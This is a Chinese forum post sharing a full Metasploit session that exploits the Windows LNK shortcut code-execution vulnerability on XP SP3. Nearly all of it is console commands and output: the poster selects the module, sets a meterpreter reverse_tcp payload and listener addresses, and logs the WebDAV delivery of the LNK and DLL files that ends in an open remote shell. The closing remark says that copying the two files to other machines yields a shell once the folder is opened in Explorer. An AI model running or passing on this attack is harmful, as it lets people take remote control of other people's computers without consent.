BYR Achieve · 镜像论坛

额.. 我也发点吧，没啥技术含量大家轻拍 ... Microsoft Windows Automatic LNK Shortcut File Code Execution XP SP3下测试通过直接看命令吧不作介绍了 __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 568 exploits - 284 auxiliary + -- --=[ 212 payloads - 27 encoders - 8 nops =[ svn r9898 updated today (2010.07.23) 查找漏洞利用 msf > search lnk [] Searching loaded modules for pattern 'lnk'... Exploits ======== Name Rank Description ---- ---- ----------- windows/browser/ms10_xxx_windows_shell_lnk_execute excellent Microsoft Windows Shell LNK Code Execution msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4). URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.1.254 SRVHOST => 192.168.1.254 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.1.254 LHOST => 192.168.1.254 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit [] Exploit running as background job. msf exploit(ms10_xxx_windows_shell_lnk_execute) > [] Started reverse handler on 192.168.1.254:4444 [] [] Send vulnerable clients to \\192.168.1.254\xNocEmT\. [] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk [] [] Using URL: http://192.168.1.254:80/ [] Server started. [] Sending UNC redirect to 192.168.1.254:25188 ... [] Sending UNC redirect to 192.168.1.254:25188 ... [] Responding to WebDAV OPTIONS request from 192.168.1.254:25199 [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/desktop.ini [] Sending 404 for /xNocEmT/desktop.ini ... [] Sending LNK file to 192.168.1.254:25199 ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/qkeLNV.dll.manifest [] Sending 404 for /xNocEmT/qkeLNV.dll.manifest ... [] Sending DLL payload 192.168.1.254:25199 ... [] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/qkeLNV.dll.123.Manifest [] Sending 404 for /xNocEmT/qkeLNV.dll.123.Manifest ... [] Sending stage (748032 bytes) to 192.168.1.254 [] Meterpreter session 1 opened (192.168.1.254:4444 -> 192.168.1.254:25203) at 2010-07-21 11:36:48 +0800 msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l -v Active sessions =============== Id Type Information Connection Via -- ---- ----------- ---------- --- 1 meterpreter CHINA-PC\xia0bai @ CHINA-PC 192.168.1.254:4444 -> 192.168.1.254:25203 exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > [] Responding to WebDAV OPTIONS request from 192.168.1.254:25209 [] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT [] Sending 301 for /xNocEmT ... [] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT/ [] Sending directory multistatus for /xNocEmT/ ... [] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT/qkeLNV.dll [] Sending DLL multistatus for /xNocEmT/qkeLNV.dll ... [] Sending DLL payload 192.168.1.254:25209 ... msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1 [] Starting interaction with 1... meterpreter > getuid Server username: CHINA-PC\xia0bai 这是会看到\\192.168.1.254\sjLJL 下面有两个文件问题就在这里了把这两个文件放在其他机器上只需要用资源管理器打开就会返回shell了[em21]